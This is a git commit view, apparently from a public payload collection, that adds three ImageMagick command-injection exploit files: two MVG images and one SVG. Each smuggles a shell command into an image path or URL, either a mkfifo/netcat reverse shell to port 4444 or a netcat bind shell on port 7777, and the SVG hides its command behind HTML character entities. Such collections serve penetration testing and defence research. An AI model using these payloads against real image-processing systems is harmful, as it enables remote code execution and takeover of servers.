Image Magick - More payloads

This commit is contained in:
Swissky 2017-07-09 17:16:42 +02:00
parent c4b49fa5ac
commit 9907a55c24
6 changed files with 17 additions and 0 deletions

View File

@ -0,0 +1,8 @@
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|mkfifo /tmp/gjdpez; nc 127.0.0.1 4444 0</tmp/gjdpez | /bin/sh >/tmp/gjdpez 2>&1; rm /tmp/gjdpez '
pop graphic-context
pop graphic-context

View File

@ -0,0 +1,4 @@
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|nc -l -p 7777 -e"/bin/sh)'
pop graphic-context

View File

@ -0,0 +1,5 @@
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1px" height="1px" viewBox="0 0 1 1" enable-background="new 0 0 1 1" xml:space="preserve"> <image id="image0" width="1" height="1" x="0" y="0"
xlink:href="&#x7c;&#x6d;&#x6b;&#x66;&#x69;&#x66;&#x6f;&#x20;&#x2f;&#x74;&#x6d;&#x70;&#x2f;&#x73;&#x6f;&#x6b;&#x74;&#x3b;&#x20;&#x6e;&#x63;&#x20;&#x31;&#x32;&#x37;&#x2e;&#x30;&#x2e;&#x30;&#x2e;&#x31;&#x20;&#x34;&#x34;&#x34;&#x34;&#x20;&#x30;&#x3c;&#x2f;&#x74;&#x6d;&#x70;&#x2f;&#x73;&#x6f;&#x6b;&#x74;&#x20;&#x7c;&#x20;&#x2f;&#x62;&#x69;&#x6e;&#x2f;&#x73;&#x68;&#x20;&#x3e;&#x2f;&#x74;&#x6d;&#x70;&#x2f;&#x73;&#x6f;&#x6b;&#x74;&#x20;&#x32;&#x3e;&#x26;&#x31;&#x3b;&#x20;&#x72;&#x6d;&#x20;&#x2f;&#x74;&#x6d;&#x70;&#x2f;&#x73;&#x6f;&#x6b;&#x74;&#x20;" />
</svg>

After

Width:  |  Height:  |  Size: 992 B